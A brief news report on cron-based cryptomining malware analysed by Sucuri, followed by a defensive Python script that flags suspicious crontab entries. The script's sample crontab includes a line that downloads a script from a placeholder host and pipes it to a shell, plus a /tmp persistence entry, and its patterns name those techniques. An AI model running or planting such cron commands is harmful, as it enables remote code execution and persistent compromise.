Security researchers spotted cryptomining malware that leveraged the cron scheduler. Researchers from the security firm Sucuri analyzed a Bash script linked to the malware, which downloaded its payload and configuration files onto the system.
The script was found to terminate other cryptomining processes on the infected system before running its own, and to use cron commands for evading detection and for reinfection.
How does it work?
Sucuri researchers suggest that the malware affects desktop installations in addition to web servers, and advise users to stay alert to malicious cron processes.
“If you overlook a malicious cronjob, it can reinfect your environment until it’s mitigated. It’s also important to remember that it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations,” the researchers explained.
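As an added illustration of the cron review the researchers recommend (this is not code from Sucuri or from the analyzed malware), the following Python sketch parses crontab text and flags entries that pipe a download into a shell or reference a temporary directory. The heuristics, function names and sample crontab are assumptions constructed for this example.

```python
import re

# Heuristics chosen for this example (assumptions, not indicators from the Sucuri report).
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
TEMP_PATH = re.compile(r"(?:^|\s)(?:/tmp|/var/tmp|/dev/shm)/")
# Five time fields or an @keyword (@reboot, @hourly, ...), then the command.
JOB = re.compile(r"^(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")
ENV = re.compile(r"^\w+\s*=")

def parse_entry(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV.match(line):
        return None
    m = JOB.match(line)
    return (m.group(1), m.group(2)) if m else None

def audit(crontab_text):
    """Return [(line_number, reasons, command)] for entries that match a heuristic."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        # In /etc/crontab and /etc/cron.d the command still starts with the user field.
        command = entry[1]
        reasons = []
        if FETCH.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("download piped to a shell")
        if TEMP_PATH.search(command):
            reasons.append("references a path under /tmp, /var/tmp or /dev/shm")
        if reasons:
            findings.append((number, reasons, command))
    return findings

# Constructed sample crontab; example.invalid is a placeholder host.
SAMPLE = """\
# constructed sample, not taken from the Sucuri report
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://example.invalid/a.sh | sh
@reboot /tmp/.x/run
15 4 * * 0 wget -q https://example.invalid/report.csv -O /srv/data/report.csv
"""

if __name__ == "__main__":
    for number, reasons, command in audit(SAMPLE):
        print(f"line {number}: {'; '.join(reasons)}: {command}")
```

On a live system the same function can be given the output of `crontab -l` for each user and the contents of files under /etc/cron.d; a match is a prompt for manual review, not proof of infection.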